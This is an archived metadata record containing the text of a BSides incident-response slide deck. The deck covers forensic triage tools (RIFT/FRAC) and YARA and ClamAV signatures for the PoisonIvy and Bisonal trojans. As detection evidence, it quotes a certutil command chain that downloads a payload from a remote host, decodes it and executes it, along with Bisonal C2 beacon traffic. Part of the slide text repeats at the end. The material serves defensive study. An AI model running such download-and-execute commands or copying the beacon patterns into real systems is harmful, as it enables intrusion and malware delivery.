{
	"id": "e69cd851-d5fa-4e2d-867e-2df227f4af64",
	"created_at": "2026-04-06T01:31:49.695277Z",
	"updated_at": "2026-04-10T13:12:36.106594Z",
	"deleted_at": null,
	"sha1_hash": "84419dc1e56b82b8ff79db2f7519b2b51785bab3",
	"title": "BSides IR in Heterogeneous Environment",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 78485,
	"plain_text": "BSides IR in Heterogeneous Environment\r\nArchived: 2026-04-06 01:26:06 UTC\r\n1.\r\n2.\r\nThe mass-triage problemin 2018 • The investigation process (Triage), in any IT incident, is the key to solve the case\r\nand to clean all the affected systems. • But in heterogeneous environments, where Windows, Linux, Mac OS, and\r\nUnix systems are potentially affected by the attacker, the investigation process is slowed by a number of technical\r\ncomplexities.  First problem is related to a common platform and procedure to adopt for the triage as many\r\ntechnologies are capable of covering only a portion of the environment.  Second problem, what to look for, as the\r\ntriage is aimed to identify malicious artifacts and usual technologies are not providing flexibility and agility to shape\r\nthe triage process.  Third problem, the capability to search the heterogeneous environment using custom IOCs. \r\nFourth problem, the possibility to pinpoint known badness which allows for easier mitigation. • In our approach, the\r\nIOCs play an important role both for the investigation process and the definition of the best way to approach the\r\ntriage. We were looking to a “rule them all” solution aimed to overcome traditional limitations of the most common\r\ncommercial solutions. 2\r\n3.\r\nTraditional IOCs application •The traditional IR approach: • Context, in regard of IOCs, typically does not exists. •\r\nApplication of IOCs to the environment is rule-based • Customization of IOCs are not an option in some commercial\r\nproducts. • Rule-based detection will miss changes made to the actor’s tools 3\r\n4.\r\nOur idea • Theproduction of code leaves traces in any binary. • The binary can contain debugging symbols, which\r\ngive you a lot of information. • Often the attacker tools include the use of specific libraries or functions. • A lot of\r\nfingerprinting can be done with software, an this is very useful for IR analyses. • The combined information of both\r\ncan help to solve the attribution problem. • Helps with assessment of risks • Identifying end goals for known actors •\r\nAid the creation of IOCs that are “actionable” and not “disposable” 4\r\n5.\r\nRIFT (Retrieve InterestingFiles Tool) ● Retrieves files/directories based on regex list ● Uses Sleuthkit to retrieve\r\nfiles forensically ● Outputs files files into a directory (machine name) ● Retrieved files are saved remote share/USB\r\n● Recreates the directory structure of where the file was found ● To run: ● Download: rift --verbose --savedrive\r\n[SAVEDRIVE] https://github.com/chaoticmachinery/frac_rift 5\r\n6.\r\n7.\r\nFRAC (Forensic ResponseACquisition) ● Uses RIFT to forensically retrieve files/directories across the network ●\r\nRecommend using PAExec or SSH/SSHPASS to connect to remote machines ● Requires local admin rights and\r\nremote share (SMB/NFS depending on OS) ● Supports single IP, CIDR notation, and IP range like the following\r\nexamples: ● Can be used to execute any command on remote machines ● To run: –172.16.10.12 –172.16.10.1/24 –\r\n172.16.10.1-172.16.10.230 frac_v0.05 --iplist iplist.txt --cmd cmd.txt –verbose paexec.exe [IP] -n 4 -u [ADMINID] -\r\np [ADMINPASS] -s cmd /C \"net use [SHAREDRV] /delete /yes \u0026 net use [SHAREDRV] [SHARE] /user:\r\n[SHAREUSERID] [SHAREPASSWD] \u0026\u0026 cd /d [SAVEDRIVE] \u0026\u0026 rift.exe -- verbose --savedrive [SAVEDRIVE]\r\n\u0026\u0026 net use [SHAREDRV] /delete /yes\" sshpass -p [ADMINPASS] ssh [IP] \"mkdir [SHAREDRV];mount\r\n[MNTOPTS] [SRCBOX]:[SRCMNT] [SHAREDRV] ; cd [SHAREDRV]/frac_v0.05 \u0026\u0026 ./rift -- verbose --savedrive\r\n[SAVEDRIVE] ; cd / \u0026\u0026 umount [SHAREDRV] \u0026\u0026 rmdir [SHAREDRV]\" Examples of Cmd.Txt 7\r\n8.\r\nFRAC (Forensic ResponseAcquisition): The Output ● FRAC/RIFT creates directories with the hostname of the\r\nmachine drwxr-xr-x 7 root root 4096 Apr 11 19:39 machinea_04112018_19-18-58 drwxr-xr-x 9 root root 4096 Apr\r\n11 20:11 machineb_04112018_15-19-02 drwxr-xr-x 135 root root 20480 Apr 11 19:37 etc -rw-r--r-- 1 root root\r\n675539 Apr 11 19:40 getfiles.txt drwxr-xr-x 3 root root 4096 Apr 11 19:37 home drwxr-xr-x 3 root root 4096 Apr 11\r\n19:37 opt drwxr-xr-x 5 root root 4096 Apr 11 19:21 root -rw-r--r-- 1 root root 230661477 Apr 11 19:43\r\nmachineb_04112018_15-19-28_fls.out drwxr-xr-x 5 root root 4096 Apr 11 19:38 usr drwxr-xr-x 5 root root 4096 Apr\r\n11 19:40 var Getfiles.txt Contains the mactime information for all of the files retrieved as well as the inode *fls.out\r\nContains the fls.out (mactime) output from the Sleuthkit FLS command. All of the directory structure is recreated and\r\nfiles are forensically copied to where they existed on the drive. 8\r\nhttps://www.slideshare.net/StefanoMaccaglia/bsides-ir-in-heterogeneous-environment\r\nPage 1 of 6\n\n9.\r\nActionable IOCs (AIOCs) •The concept of “actionable” IOCs has been derived and refined from a collective set of\r\nIncident Response investigations, and could become a valid support of our investigative process if organized in a\r\nscientifically sound approach. • Utilizes procedures, analysis, and evidence for a methodical approach • Based on\r\npositive matches can help identify the attacker • It allow the creation of a structured knowledge base of attackers •\r\nThe knowledge base allows the creation of attacker profiles 9\r\n10.\r\n11.\r\nExample: PoisonIvy • PoisonIvy,a Remote Access Tool/Trojan (RAT) often used in targeted attacks, had been widely\r\nseen until around 2013. • Since then, the number of cases using PoisonIvy decreased, and there was no special variant\r\nwith expanded features seen in the wild. • However, recently, we identified PoisonIvy with expanded features in its\r\ncommunication function capable to bypass HTTP/HTTPS proxy in APT and cybercriminal attacks thanks to\r\nmodifications in the malware code. Latest PoisonIvy variants are different 11\r\n12.\r\nYARA RULES PoisonIvy typicalIOC rule poisonivy_1 : rat { meta: description = \"Poison Ivy\" author = \"Jean-Philippe Teissier / @Jipe_\" date = \"2013-02-01\" filetype = \"memory\" version = \"1.0\" ref1 =\r\n\"https://code.google.com/p/volatility/source/browse/trunk/contrib/plugins/malware/poisonivy.py strings: $a = { 53 74\r\n75 62 50 61 74 68 ?? 53 4F 46 54 57 41 52 45 5C 43 6C 61 73 73 65 73 5C 68 74 74 70 5C 73 68 65 6C 6C 5C 6F\r\n70 65 6E 5C 63 6F 6D 6D 61 6E 64 [22] 53 6F 66 74 77 61 72 65 5C 4D 69 63 72 6F 73 6F 66 74 5C 41 63 74 69 76\r\n65 20 53 65 74 75 70 5C 49 6E 73 74 61 6C 6C 65 64 20 43 6F 6D 70 6F 6E 65 6E 74 73 5C } condition: $a } rule\r\nPoisonIvy_2 { meta: author = \" Kevin Breen \u003ckevin@techanarchy.net\u003e\" date = \"2014/04\" ref =\r\n\"http://malwareconfig.com/stats/PoisonIvy\" maltype = \"Remote Access Trojan\" filetype = \"exe\" strings: $stub = {04\r\n08 00 53 74 75 62 50 61 74 68 18 04} $string1 = \"CONNECT %s:%i HTTP/1.0\" $string2 = \"ws2_32\" $string3 =\r\n\"cks=u\" $string4 = \"thj@h\" $string5 = \"advpack\" condition: $stub at 0x1620 and all of ($string*) or (all of them) } }\r\nrule PoisonIvy_Generic_3 { meta: description = \"PoisonIvy RAT Generic Rule\" author = \"Florian Roth\" date =\r\n\"2015-05-14\" hash = \"e1cbdf740785f97c93a0a7a01ef2614be792afcd\" strings: $k1 = \"Tiger324{\" fullword ascii $s2\r\n= \"WININET.dll\" fullword ascii $s3 = \"mscoree.dll\" fullword wide $s4 = \"WS2_32.dll\" fullword $s5 =\r\n\"Explorer.exe\" fullword wide $s6 = \"USER32.DLL\" $s7 = \"CONOUT$\" $s8 = \"login.asp\" $h1 = \"HTTP/1.0\" $h2 =\r\n\"POST\" $h3 = \"login.asp\" $h4 = \"check.asp\" $h5 = \"result.asp\" $h6 = \"upload.asp\" condition: uint16(0) == 0x5a4d\r\nand filesize \u003c 500KB and ( $k1 or all of ($s*) or all of ($h*) ) rule PoisonIvy_Sample_APT { meta: description =\r\n\"Detects a PoisonIvy APT malware group\" author = \"Florian Roth\" reference = \"VT Analysis\" date = \"2015-06-03\"\r\nhash = \"b874b76ff7b281c8baa80e4a71fc9be514093c70\" strings: $s0 = \"pidll.dll\" fullword ascii $s1 = \"sens32.dll\"\r\nfullword wide $s3 = \"FileDescription\" fullword wide $s4 = \"OriginalFilename\" fullword $s5 =\r\n\"ZwSetInformationProcess\" fullword ascii $s9 = \"Microsoft Media Device Service Provider\" fullword wide\r\ncondition: uint16(0) == 0x5a4d and filesize \u003c 47KB and all of them } 12\r\n13.\r\nrule PoisonIvy { strings: $s1= \"%supdate%4d%02d%02d%02d%02d%02d.tmp\" wide ascii $s2 = \"cks=u\" wide ascii\r\n$s3 = “CONNECT %s:%i HTTP//1.0” wide ascii $s4 = “vry7fo/URLDownez{” wide ascii $s5 = “6u%u.193.%d”\r\nwide ascii $s6 = “/c del %s \u003e nul” wide ascii $s7 = “%u.193.%d.%d” wide ascii $s8 = “GET %s HTTP/1.1” wide\r\nascii condition: ($s1 and $s2 and $s3) or ($s4 and $s5) or ($s6 and $s7 and $s8) and // MZ signature at offset 0 and ...\r\nuint16(0) == 0x5A4D and // ... PE signature at offset stored in MZ header at 0x3C uint32(uint32(0x3C)) ==\r\n0x00004550 } YARA RULES PoisonIvy Actionable IOC: Yara rule The first three strings identify the PoisonIvy\r\ngeneric variants, including latest ones. These strings match an old version of PoisonIvy 2011 packed in UPX. For the\r\nsame sample, we use these strings to match the decompressed version of PoisonIvy (always 2011).\r\n14.\r\nAIOCs formalization process Atomic IOCs Highorder Yara rules for files and packets Actor tags and attack\r\ndescriptions Actor tools High order ClamAV signature High order log and system artifacts System and network\r\nvisibility Alternative System visibility Log and artifacts visibility Classification and attribution Virustotal and other\r\nrepository searches Evolutive and comparative analysis formalization 14\r\n15.\r\n• Bisonal isanother example. It is a backdoor. • The malware can be split into two components:  the main module,\r\n communication module. • The main module is responsible for providing the framework to execute the various\r\ncomponents within the malware. • The communication module is responsible for the sending of information to the\r\nserver, receiving new commands from it and downloading of new executable. • If a new executable is downloaded\r\nsuccessfully, it will notifying the main module to execute it. • The malware is capable of: • Listing and controlling\r\nhttps://www.slideshare.net/StefanoMaccaglia/bsides-ir-in-heterogeneous-environment\r\nPage 2 of 6\n\nprocesses • Creating and deleting files • Creating a remote shell • Downloading and executing files • Bisonal is an\r\nAPT tool. Trojan.Bisonal 15\r\n16.\r\nTrojan.Bisonal traffic • Custom“flag” and c2 domain – used to track victim 16 GET /j/news.asp?id=* HTTP/1.1\r\nUser-Agent: flag:khi host:Business IP:10.0.0.51 OS:XPSP3 vm:.. proxy:.. Host: online.cleansite.us Cache-Control:\r\nno-cache ---------------- GET /a.asp?id=* HTTP/1.1 Accept:*/* Accept-Encoding: gzip, deflate User-Agent:\r\nMozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0;.NET CLR 2.0.50727; .NET CLR\r\n3.0.04.506.648;.NET CLR 3.5.21002) Host: khi.acmetoy.com Connection: Keep-Alive GET /rc/news1.asp?\r\nid=flag:831nec%20host:Remote%20PC%20 IP:169.254.100.211%20OS:XPSP3%20vm:..%20proxy:.. HTTP/1.1\r\nUser-Agent: flag:831nec host:Remote PC IP:169.254.100.211 OS:XPSP3 vm:?? proxy:?? Host: online.4pu.com ------\r\n---------- GET /a.asp?id=* HTTP/1.1 Accept:*/* Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0\r\n(compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0;.NET CLR 2.0.50727; .NET CLR 3.0.04.506.648;.NET CLR\r\n3.5.21002) Host: necnec.dns04.com Connection: Keep-Alive\r\n17.\r\nTrojan.Bisonal resulting AIOCdescription o Type of malware: Modular Trojan (single stage), mainly used for data\r\nstealing o Capabilities: beaconing, listing and controlling processes, creating and deleting files, creating remote\r\nshells, downloading and executing files o Dissemination strategy: via Dropper or email attachment o Architecture:\r\nClient / Server using public C2s o Type of communication: HTTP protocol (in general it uses TCP/80 and TCP/443,\r\nbut port can be customized) o Related Adversary: HeartBeat APT Group (Chinese) o Earlier Adversary detection:\r\nNovember 2009 (South Korea - TrendMicro) o Area of operation: actually limited to Asia (including Russia) o\r\nRecorded targets: Mitsubishi Heavy Industries, NEC Corp, Nippon Steel Corp, IHI Corp, several Ministries in Japan\r\nand South Korea. o Type of AIOCs developed: Yara rules for files, Yara rules for PCAPs, ClamAV rules, Snort Rule,\r\nRegistry and logs. 17\r\n18.\r\nBisonal Behavior  Sample:918a78b49397b17da48f37206fa7801b11d410ea6faa755d0aa27872c7e84c74  set\r\nregistry value  key: HKCUSoftwareMicrosoftWindowsCurrentVersionRun value: dfea data:\r\nC:Windowstasksdfea.exe  key: HKCUSoftwareMicrosoftWindowsCurrentVersionInternet SettingsZoneMap value:\r\nUNCAsIntranet data: 0  key: HKCUSoftwareMicrosoftWindowsCurrentVersionInternet SettingsZoneMap value:\r\nAutoDetect data: 1  Sample\u003e E8ff9de367c771fd9a5ae2df91b62fe57a64f528a7a80dbd9e307a7ae3e6af80  Set\r\nregistry value  key: HKCUSoftwareMicrosoftWindowsCurrentVersionInternet SettingsZoneMap value:\r\nUNCAsIntranet data: 0  key: HKCUSoftwareMicrosoftWindowsCurrentVersionInternet SettingsZoneMap value:\r\nAutoDetect data: 1 Registry keys IOCs 18  Sample:\r\n918a78b49397b17da48f37206fa7801b11d410ea6faa755d0aa27872c7e84c74  Create File \r\nC:WindowsTasksdfea.exe  Sample: E8ff9de367c771fd9a5ae2df91b62fe57a64f528a7a80dbd9e307a7ae3e6af80 \r\nCreate File  C:UsersAdminAppDataLocalTempchrome.exe  C:WindowsTaskstaskeng.exe Created files IOCs\r\n19.\r\nYARA RULES rule Trojan.Bisonal{ strings: $s1 = \"wkko%00hhh1y~|t}ppt1|pr0Josp~{Yvsz0y~rz0g0p/1~lo\" wide\r\nascii $s2 = \"defa\" wide ascii $s3 = \"love a meng\" wide ascii $s4 = \"HE@L-PShellE\" wide ascii $s5 = \"xecut\" $s6 =\r\n\"wkko%00yjq{1|r|1pm1tm0Josp~{Yvsz0y~rz0g0p/1~lo\" wide ascii $s7 = \"http://%s/%s.asp?id=%s%s%s\" $s8 =\r\n\"http://%s/a.asp?id=%s%s\" $s9 = \"c:a1.txt“ condition: ($s1 and $s2) or ($s2 and $s3) or ($s4 and $5) and ($s6 and\r\n$s7 and $s8 and $s9) and // MZ signature at offset 0 and ... uint16(0) == 0x5A4D and // ... PE signature at offset\r\nstored in MZ header at 0x3C uint32(uint32(0x3C)) == 0x00004550 } Trojan.Bisonal family the first two strings are\r\ncommon to other Bisonal samples, but not all. The latest samples contain different strings, except for $s6 string\r\nwhich is very similar to the first string in conditition $s1. These strings match a Bisonal sample that uses a common\r\nobfuscation techniques(split a word in more lines). Beyond the common string “defa” the samples of bisonal present\r\ndifferent string. 19\r\n20.\r\n Flag:727x  Flag:1223 Flag:8080  Flag:84d  Flag:d2  Flag:dick  Flag:ihi IHI Corp  Flag:m615 \r\nFlag:MARK 1  Flag:nec01NEC Corp  Flag:nsc516 Nippon Streel Corp  Flag:qqq  Flag:toray  Flag:410maff\r\nMinistry of Agriculture, Forestry and Fisheries  Flag:712mhi Mitsubishi Heavy Industries  ... YARA RULES\r\ntoward AIOCs Trojan.Bisonal family rule campaignA { strings: $s00 = \"Flag:8080\" ascii wide nocase condition: all\r\nof them and uint16(0) == 0xC3D4 } rule campaignB { strings: $s00 = \"Flag:84d\" ascii wide nocase condition: all of\r\nthem and uint16(0) == 0xC3D4 } rule campaignC { strings: $s00 = \"flag:boat\" ascii wide nocase condition: all of\r\nthem and uint16(0) == 0xC3D4 } rule campaignD { strings: $s00 = \"Flag:d2\" ascii wide nocase condition: all of\r\nthem and uint16(0) == 0xC3D4 } rule campaignE { strings: $s00 = \"Flag:dick\" ascii wide nocase condition: all of\r\nthem and uint16(0) == 0xC3D4 } rule campaignF { strings: $s00 = \"flag:ihi\" ascii wide nocase condition: all of them\r\nand uint16(0) == 0xC3D4 } rule campaignW { strings: $s00 = \"Flag:qqq\" ascii wide nocase condition: all of them\r\nhttps://www.slideshare.net/StefanoMaccaglia/bsides-ir-in-heterogeneous-environment\r\nPage 3 of 6\n\nand uint16(0) == 0xC3D4 } To develop AIOCs from atomic indicators we need to incorporate «actionable» elements\r\nthat link the malware to a specific actor and campaign... This Yara can be applied to PCAPs 20\r\n21.\r\n22.\r\n22 Clam AV: Intro •ClamAV is an open source and free anti-virus program. • ClamAV runs on Windows (ClamWin),\r\nLinux, BSD, Solaris, and Mac OS X, and its mainly designed to scan email attachment, but it can be used as a regular\r\nanti- virus. • ClamAV includes: • Features • Can search archives • Can search multiple file types • Multithreaded \r\nClamscan  Clamdscan/Clamd  Freshclam Command line virus scanner Client/Server virus scanner tool to update\r\nthe virus definition database\r\n23.\r\n23 YARA Rules, AIOCsand ClamAV • Yara is the swiss army knife for any low-cost triage and can be applied to\r\nmany endpoint forensic platforms. • Values that work across multiple platforms • Text strings • Hex values that are in\r\nmultiple versions of the binary • ClamAV provides combination of both worlds. • By empowering ClamAV with Yara\r\nrules, we are able to run massive triage on almost all type of system using AIOCs we have developed.\r\n24.\r\nUsing ClamAV toScan for Badness clamscan --infected --recursive --allmatch –archive -verbose --database ./{yara\r\nsigs}.yara {starting directory} | tee clamav_{date}_yara clamscan --infected --recursive --allmatch --archive-verbose\r\n--database ./{clamav sigs}.ldb {starting directory} | tee clamav_{date}_sigs 24\r\n25.\r\nUsing ClamAV: ResultsCustom Rules - ClamAV ● Multiple hits on the same file helps to verify results /kswapd0:\r\ncpuminer_v2.3.3_64bit.UNOFFICIAL FOUND /kswapd0: cpuminer_generic.UNOFFICIAL FOUND /kswapd0:\r\ncpuminer_v2.3.3_102917_64bit.UNOFFICIAL FOUND /kswapd0: cpuminer_v2.3.3_102917_32bit.UNOFFICIAL\r\nFOUND /kswapd0!(0): cpuminer_v2.3.3_102917_32bit.UNOFFICIAL FOUND /minerd:\r\nminerd_cpuminer_v2.3.3_64bit.UNOFFICIAL FOUND /minerd: cpuminer_generic.UNOFFICIAL FOUND\r\n/minerd!(0): cpuminer_generic.UNOFFICIAL FOUND /yam: yam_cpuminer_64bit.UNOFFICIAL FOUND /yam!\r\n(0): yam_cpuminer_64bit.UNOFFICIAL FOUND /gcc: XMRig_v2.3.1.UNOFFICIAL FOUND /gcc!(0):\r\nXMRig_v2.3.1.UNOFFICIAL FOUND 25\r\n26.\r\nUsing ClamAV: ResultsCustom Rules - Yara ● Multiple hits on the same file helps to verify results config.json:\r\nYARA.stratum.UNOFFICIAL FOUND config.json: YARA.monero.UNOFFICIAL FOUND config.json:\r\nYARA.monerohashcom.UNOFFICIAL FOUND config.json!(0): YARA.monerohashcom.UNOFFICIAL FOUND\r\noutfile: YARA.stratum.UNOFFICIAL FOUND outfile: YARA.cpuminer.UNOFFICIAL FOUND outfile!(0):\r\nYARA.cpuminer.UNOFFICIAL FOUND kswapd0: YARA.stratum.UNOFFICIAL FOUND kswapd0:\r\nYARA.cpuminer.UNOFFICIAL FOUND kswapd0!(0): YARA.cpuminer.UNOFFICIAL FOUND 26\r\n27.\r\nSigtool: ClamAV commandline 27 Sigtool (signature and database management tool) Signature using the hash of the\r\nPE-section of an executable Signature using full MD5 hash of file Signature using the a hex fragment of a file\r\n28.\r\nC:Documents and SettingsuserDesktop\u003esigtool --md5 malware.exe \u003e\u003e sigFile.hdb C:Documents and\r\nSettingsuserDesktop\u003etype sigFile.hdb B4619d8058362b38d20480c14d30c209:40500:malware.exe C:Documents and\r\nSettingsuserDesktop\u003e sigtool --mdb malware.exe.text.dat \u003e\u003e sigFile.mdb • To create a unique signature for an\r\nexecutable file we use the --md5 option of sigtool, and then save the output into a file with a “.hdb” extension. • To\r\ncreate a signature that will match a particular PE section (typically the sections are labelled .text, .rdata, .data, .idata,\r\netc.), use the “--mdb” option of sigtool and then save the output into a “.mdb” file. The easiest way to generate MD5\r\nbased section signatures is to extract target PE sections into separate files. Sigtool: Command explained 28\r\n29.\r\nC:Documents and SettingsuserDesktop\u003eecho I am malware | sigtool --hex-dump\r\n4920616d2061206d616c77617265200d0a C:Documents and SettingsuserDesktop\u003e echo\r\ntestSig:0:*:4920616d2061206d616c77617265200d0a \u003e\u003e sigFile.ndb • The last method is to use Body-based\r\nsignatures in an hexadecimal format. It relies on extracted strings from the body of the file. • In the next example we\r\ncreate an hex dump of the string “I am malware”. • Next we save the signature that has the format called “Extended\r\nSignature”: MalwareName:TargetType:Offset:HexSignature and redirect the output to a file “.ndb”. Sigtool:\r\nCommand explained 29\r\nhttps://www.slideshare.net/StefanoMaccaglia/bsides-ir-in-heterogeneous-environment\r\nPage 4 of 6\n\n30.\r\nGenerating ClamAV Signatureswith IDA with CASC ● ClamAV Signature Creator (CASC) ● How to use it:\r\nhttps://github.com/Cisco-Talos/CASC/wiki Open binary in IDA and select Strings Window Right click and select add\r\nstring 1 Select text2 3 30\r\n31.\r\nGenerating ClamAV Signatureswith IDA with CASC • Select signature(s) and hit “Create ClamAV Signature” button\r\non the ClamAV Signature Creator view. • In the popup, find the signature and save to file Note: Make sure the\r\nextension is ldb 4 5 31\r\n32.\r\nRemote ClamAV scanwith Psexec  Psexec can execute remote commands and so start the scan on every computer\r\nof a network.  To use Psexec, the user must have rights to access the filesystem of the target computer. \u003e psexec\r\n192.168.81.128 -u administrator -p p4ssw0rd1! \"C:Program Files (x86)ClamAV clamscan\" -r -d C:bioazih.ndb C: \u003e\r\npsexec DESTINATIONIP -u USER -p PASSWORD “REMOTE_PATH_TO_CLAMSCAN\" -r -d\r\nLOCAL_PATH_TO_CLAMAV_DATABASE_FILE REMOTE_PATH_TO_SCAN Psxec machine with ClamAV DB\r\nScanned Host 1 Scanned Host 2 Scanned Host 3 32\r\n33.\r\nRemote ClamAV scanwith FRAC  FRAC can be used to scan the network.  It tracks those IP addresses that\r\ncannot be connected so that can be feed back to FRAC later for scanning.  Remember to create a share with clam\r\ndatabases  Might be able to scan more 25 boxes at a time. Do sensitive boxes by hand vs using FRAC. FRAC\r\nmachine with ClamAV DB Scanned Host 1 Scanned Host 2 Scanned Host 3 ./frac_v0.05.pl --iplist iplist.txt --cmd\r\ncmd.txt --verbose 33\r\n34.\r\nClamAV PoisonIvy variantssignature\r\nPoisonIvy2015:0:*:257375706461746525346425303264253032642530326425303264253032642e746d70*434f4e4e4543542025733a256920485\r\nPoisonIVY2011:0:*:202f632064656c202573203e206e756c*25752e3139332e25642e2564*47455420257320485454502f312e31*757564646f736\r\nPoisonIVY2011UPX:0:*:76727937666f2f55524c446f776e657a7b*365c5c7525752e3139332e2564 The second part\r\ncontains instead “CONNECT %s:%i HTTP//1.0” The first Rule contains two non-successive strings divided by the\r\nsymbol “*”. The first string translated from hexadecimal contains the word\r\n“%supdate%4d%02d%02d%02d%02d%02d.tmp”. This rule takes a Poison Ivy sample dated 2011 and we use 3\r\ndifferent strings. The first is “/c del %s \u003e nul” The second strings is “GET %s HTTP/1.1” The last matches to\r\n“uuddosbea” The third rule is the same sample mentioned above, but without the package UPX. The first of two\r\nstrings is “vry7fo/URLDownez{” The second strings is “6u%u.193.%d” 34\r\n35.\r\nClamAV Bisonal -logic signature BISONAL;Target:1;(0\u00261\u00262)|(0\u00262\u00263)|(4\u00265)|\r\n(6\u00267\u00268);534f4654574152455c4d6963726f736f66745c57696e646f77735c43757272656e7456657273696f6e5c52756e;776b6\r\nb6f25303068686831797e7c747d707074317c7072304a6f73707e7b5976737a30797e727a306730702f317e6c6f;633a5c77696e646f77735c7461736\r\n65;6c6f76652061206d656e67;4845404c2d505368656c6c45;7865637574;776b6b6f253030796a717b317c727c31706d31746d304a6f73707e7b597\r\n730702f317e6c6f;687474703a2f2f25732f25732e6173703f69643d257325732573;633a5c615c322e747874\r\nBISONAL;Target:1;(0\u00261\u00262)|(0\u00262\u00263)|(4\u00265)|(6\u00267\u00268) This is a ClamAV “Body-based”, slightly different, from the\r\nprevious one. It has to be put inside a “.LDB” file and it is possible to use logic operators inside the rule. Logical\r\noperators in action within the BISONAL signature. Numbers are placeholders for the hex strings. Match IF found:\r\n(both strings 0,1 and 2) OR (both strings 0,2 and 3) OR (only strings 4 and 5) OR (both strings 6,7 and 8).\r\n534f4654574152455c4d6963726f736f66745c57696e646f77735c43757272656e7456657273696f6e5c52756e =\r\nSOFTWAREMicrosoftWindowsCurrentVersionRun\r\n776b6b6f25303068686831797e7c747d707074317c7072304a6f73707e7b5976737a30797e727a306730702f317e6 c6f\r\n= wkko%00hhh1y~|t}ppt1|pr0Josp~{Yvsz0y~rz0g0p/1~lo\r\n633a5c77696e646f77735c7461736b735c646566612e657865 = c:windowstasksdfea.exe 6c6f76652061206d656e67 =\r\nlove a meng 4845404c2d505368656c6c45 = HE@L-PShellE 7865637574 = xecut\r\n776b6b6f253030796a717b317c727c31706d31746d304a6f73707e7b5976737a30797e727a306730702f317e6c6f =\r\nwkko%00yjq{1|r|1pm1tm0Josp~{Yvsz0y~rz0g0p/1~lo\r\n687474703a2f2f25732f25732e6173703f69643d257325732573 = http://%s/%s.asp?id=%s%s%s\r\n633a5c615c322e747874 = c:a2.txtz 1 2 3 4 5 6 7 8 0 35\r\n36.\r\nClamAV and Forensics ●ClamAV can help with Forensics investigations – Can detect badness in log files – Example\r\nFind: ● Find in the section C of the modsec logs: ●/var/log/httpd/modsec_audit.log:\r\nhttps://www.slideshare.net/StefanoMaccaglia/bsides-ir-in-heterogeneous-environment\r\nPage 5 of 6\n\nWin.Downloader.CertutilURLCache-6335697-0 FOUND ●certutil -urlcache -split -f http://xx.xx.xx.xx/update.b64\r\nupdate.b64 ●certutil -decode update.b64 update.exe ●update.exe 36\r\n37.\r\n• Actionable IOCsis an answer to the need of solid indicators to support the investigation, the attribution and the\r\ntriage, of incidents generated by malicious actors. • The adoption of this methodology can positively impact\r\ninvestigation and triage, but also improves knowledge of the tools and strategies adopted by the adversaries. • The\r\nformalization process behind it can facilitate the exchange of information and indicators without the risk of\r\nunintentional leakage of sensitive information and, in short, strengthen the proactive and reactive capabilities of any\r\nstructure. Where are we heading\r\n38.\r\nSource: https://www.slideshare.net/StefanoMaccaglia/bsides-ir-in-heterogeneous-environment\r\nhttps://www.slideshare.net/StefanoMaccaglia/bsides-ir-in-heterogeneous-environment\r\nPage 6 of 6\n\nremote share examples: (SMB/NFS depending ● Can be used to execute on OS) ● Supports single any command on remote IP, CIDR notation, machines ● To run: and IP range like –172.16.10.12 –172.16.10.1/24 the following –\n172.16.10.1-172.16.10.230 frac_v0.05 --iplist iplist.txt--cmd cmd.txt-verbose paexec.exe [IP]-n 4-u [ADMINID]-\np [ADMINPASS] -s cmd /C \"net use [SHAREDRV] /delete /yes \u0026 net use [SHAREDRV] [SHARE] /user:\n[SHAREUSERID] [SHAREPASSWD] \u0026\u0026 cd /d [SAVEDRIVE] \u0026\u0026 rift.exe-- verbose--savedrive [SAVEDRIVE]\n\u0026\u0026 net use [SHAREDRV] /delete /yes\" sshpass-p [ADMINPASS] ssh [IP] \"mkdir [SHAREDRV];mount \n[MNTOPTS] [SRCBOX]:[SRCMNT] [SHAREDRV] ; cd [SHAREDRV]/frac_v0.05 \u0026\u0026 ./rift-- verbose--savedrive\n[SAVEDRIVE] ; cd / \u0026\u0026 umount [SHAREDRV] \u0026\u0026 rmdir [SHAREDRV]\" Examples of Cmd.Txt 7\n8.     \nFRAC (Forensic ResponseAcquisition): The Output ● FRAC/RIFT creates directories with the hostname of the\nmachine drwxr-xr-x 7 root root 4096 Apr 11 19:39 machinea_04112018_19-18-58  drwxr-xr-x 9 root root 4096 Apr\n11 20:11 machineb_04112018_15-19-02 drwxr-xr-x 135 root root 20480 Apr 11 19:37 etc-rw-r--r-- 1 root root\n675539 Apr 11 19:40 getfiles.txt drwxr-xr-x 3 root root 4096 Apr 11 19:37 home drwxr-xr-x 3 root root 4096 Apr 11\n19:37 opt drwxr-xr-x 5 root root 4096 Apr 11 19:21 root-rw-r--r-- 1 root root 230661477 Apr 11 19:43 \nmachineb_04112018_15-19-28_fls.out  drwxr-xr-x 5 root root 4096 Apr 11 19:38 usr drwxr-xr-x 5 root root 4096 Apr\n11 19:40 var Getfiles.txt Contains the mactime information for all of the files retrieved as well as the inode *fls.out\nContains the fls.out (mactime) output from the Sleuthkit FLS command. All of the directory structure is recreated and\nfiles are forensically copied to where they existed on the drive. 8  \n  Page 1 of 6",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.slideshare.net/StefanoMaccaglia/bsides-ir-in-heterogeneous-environment"
	],
	"report_names": [
		"bsides-ir-in-heterogeneous-environment"
	],
	"threat_actors": [
		{
			"id": "75108fc1-7f6a-450e-b024-10284f3f62bb",
			"created_at": "2024-11-01T02:00:52.756877Z",
			"updated_at": "2026-04-10T02:00:05.273746Z",
			"deleted_at": null,
			"main_name": "Play",
			"aliases": null,
			"source_name": "MITRE:Play",
			"tools": [
				"Nltest",
				"AdFind",
				"PsExec",
				"Wevtutil",
				"Cobalt Strike",
				"Playcrypt",
				"Mimikatz"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775439109,
	"ts_updated_at": 1775826756,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/84419dc1e56b82b8ff79db2f7519b2b51785bab3.pdf",
		"text": "https://archive.orkl.eu/84419dc1e56b82b8ff79db2f7519b2b51785bab3.txt",
		"img": "https://archive.orkl.eu/84419dc1e56b82b8ff79db2f7519b2b51785bab3.jpg"
	}
}